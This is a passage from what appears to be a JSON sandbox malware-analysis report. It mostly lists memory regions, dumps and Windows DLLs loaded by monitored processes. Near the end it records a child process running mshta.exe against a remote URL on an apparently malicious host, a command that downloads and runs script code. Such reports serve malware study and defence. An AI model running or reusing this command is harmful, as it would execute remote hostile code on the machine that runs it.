"process_00000005-region_00000944-addr_0x0000000002ab0000-size_0x00000000001b0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1769472, "start_va": 44761088, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x0000000002ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44761088, "timestamp": "00:01:03.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000945-addr_0x00000000026e0000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 41222143, "entry_point": 0, "filename": null, "id": "region_945", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:01:03.808", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000946-addr_0x00000000027f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41877504, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_946", "name": "private_0x00000000027f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41877504, "timestamp": "00:01:03.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42663936, "type": "region", "version": 1 }, "end_va": 43712511, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x00000000028b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42663936, "timestamp": "00:01:03.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 46530560, "type": "region", "version": 1 }, "end_va": 47579135, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x0000000002c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 46530560, "timestamp": "00:01:03.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000949-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:03.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000950-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_950", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:03.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791603871744, "type": "region", "version": 1 }, "end_va": 8791603904511, "entry_point": 8791603876884, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_951", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:01:03.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45023232, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x0000000002af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45023232, "timestamp": "00:01:03.824", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000953-addr_0x0000000002c50000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 46465024, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_953", "name": "private_0x0000000002c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 46465024, "timestamp": "00:01:03.824", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000954-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_954", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:03.824", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000955-addr_0x00000000026e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 41025535, "entry_point": 0, "filename": null, "id": "region_955", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:01:03.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791713906688, "type": "region", "version": 1 }, "end_va": 8791713992703, "entry_point": 8791713911456, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_961", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713906688, "timestamp": "00:01:03.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791713775616, "type": "region", "version": 1 }, "end_va": 8791713878015, "entry_point": 8791713781628, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_962", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713775616, "timestamp": "00:01:03.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 348160, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747940351, "entry_point": 8791747596372, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_963", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:01:03.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791713710080, "type": "region", "version": 1 }, "end_va": 8791713755135, "entry_point": 8791713714912, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_964", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 8791713710080, "timestamp": "00:01:03.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791741300736, "type": "region", "version": 1 }, "end_va": 8791741329407, "entry_point": 8791741306032, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_965", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 8791741300736, "timestamp": "00:01:03.851", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791747526656, "type": "region", "version": 1 }, "end_va": 8791747555327, "entry_point": 8791747531820, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_966", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 8791747526656, "timestamp": "00:01:03.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 339968, "start_va": 8791727276032, "type": "region", "version": 1 }, "end_va": 8791727615999, "entry_point": 8791727287192, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_967", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 8791727276032, "timestamp": "00:01:03.866", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000968-addr_0x0000000002ee0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 49152000, "type": "region", "version": 1 }, "end_va": 49676287, "entry_point": 0, "filename": null, "id": "region_968", "name": "private_0x0000000002ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49152000, "timestamp": "00:01:03.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 8791636967424, "type": "region", "version": 1 }, "end_va": 8791637442559, "entry_point": 8791636993776, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_969", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 8791636967424, "timestamp": "00:01:03.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_970", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:03.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_971", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:03.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_972", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:03.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50659328, "type": "region", "version": 1 }, "end_va": 51707903, "entry_point": 0, "filename": null, "id": "region_1120", "name": "private_0x0000000003050000", "norm_filename": null, "region_type": "private_memory", "start_va": 50659328, "timestamp": "00:01:04.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791593017388, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1121", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:01:04.084", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001122-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:04.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52035584, "type": "region", "version": 1 }, "end_va": 53084159, "entry_point": 0, "filename": null, "id": "region_1123", "name": "private_0x00000000031a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52035584, "timestamp": "00:01:04.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2006712320, "type": "region", "version": 1 }, "end_va": 2006724607, "entry_point": 2006712320, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1124", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2006712320, "timestamp": "00:01:04.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001125-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_1125", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:04.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791726948352, "type": "region", "version": 1 }, "end_va": 8791727046655, "entry_point": 8791726955512, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1126", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 8791726948352, "timestamp": "00:01:04.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791727079424, "type": "region", "version": 1 }, "end_va": 8791727149055, "entry_point": 8791727085228, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_1127", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 8791727079424, "timestamp": "00:01:04.137", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001131-addr_0x00000000032d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 53280768, "type": "region", "version": 1 }, "end_va": 54329343, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x00000000032d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53280768, "timestamp": "00:01:04.178", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001132-addr_0x000007fffffaa000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1132", "name": "private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092669952, "timestamp": "00:01:04.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 47710208, "type": "region", "version": 1 }, "end_va": 48758783, "entry_point": 0, "filename": null, "id": "region_1140", "name": "private_0x0000000002d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 47710208, "timestamp": "00:01:04.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791581261824, "type": "region", "version": 1 }, "end_va": 8791581319167, "entry_point": 8791581266032, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_1141", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791581261824, "timestamp": "00:01:04.227", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001142-addr_0x000007fffffa8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": "00:01:04.227", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001143-addr_0x00000000033d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 54329344, "type": "region", "version": 1 }, "end_va": 55377919, "entry_point": 0, "filename": null, "id": "region_1143", "name": "private_0x00000000033d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 54329344, "timestamp": "00:01:04.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791566254080, "type": "region", "version": 1 }, "end_va": 8791566598143, "entry_point": 8791566258252, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1144", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791566254080, "timestamp": "00:01:04.302", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6426623, "entry_point": 6422528, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1145", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 6422528, "timestamp": "00:01:04.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791754342400, "type": "region", "version": 1 }, "end_va": 8791754936319, "entry_point": 8791754347584, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1149", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791754342400, "timestamp": "00:01:04.333", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 31723519, "entry_point": 0, "filename": null, "id": "region_1150", "name": "pagefile_0x0000000001e40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31719424, "timestamp": "00:01:04.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791566647296, "type": "region", "version": 1 }, "end_va": 8791578931199, "entry_point": 8791566647296, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1157", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791566647296, "timestamp": "00:01:04.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 31727615, "entry_point": 0, "filename": null, "id": "region_1160", "name": "pagefile_0x0000000001e40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31719424, "timestamp": "00:01:04.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 32968703, "entry_point": 32899072, "filename": "\\Windows\\System32\\C_20127.NLS", "id": "region_1168", "name": "c_20127.nls", "norm_filename": "c:\\windows\\system32\\c_20127.nls", "region_type": "memory_mapped_file", "start_va": 32899072, "timestamp": "00:01:07.045", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001169-addr_0x0000000001f80000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1169", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:01:07.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 55377920, "type": "region", "version": 1 }, "end_va": 59518975, "entry_point": 0, "filename": null, "id": "region_1170", "name": "pagefile_0x00000000034d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55377920, "timestamp": "00:01:07.046", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001172-addr_0x000007fffffa6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, "filename": null, "id": "region_1172", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092653568, "timestamp": "00:01:07.047", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001249-addr_0x0000000002020000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_1249", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:01:07.377", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001267-addr_0x0000000003a50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 61145088, "type": "region", "version": 1 }, "end_va": 62193663, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x0000000003a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 61145088, "timestamp": "00:01:07.460", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001269-addr_0x000007fffffa4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092645376, "type": "region", "version": 1 }, "end_va": 8796092653567, "entry_point": 0, "filename": null, "id": "region_1269", "name": "private_0x000007fffffa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092645376, "timestamp": "00:01:07.462", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001277-addr_0x0000000003b50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 62193664, "type": "region", "version": 1 }, "end_va": 63242239, "entry_point": 0, "filename": null, "id": "region_1277", "name": "private_0x0000000003b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 62193664, "timestamp": "00:01:07.505", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_7", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001179-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1179", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:07.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], 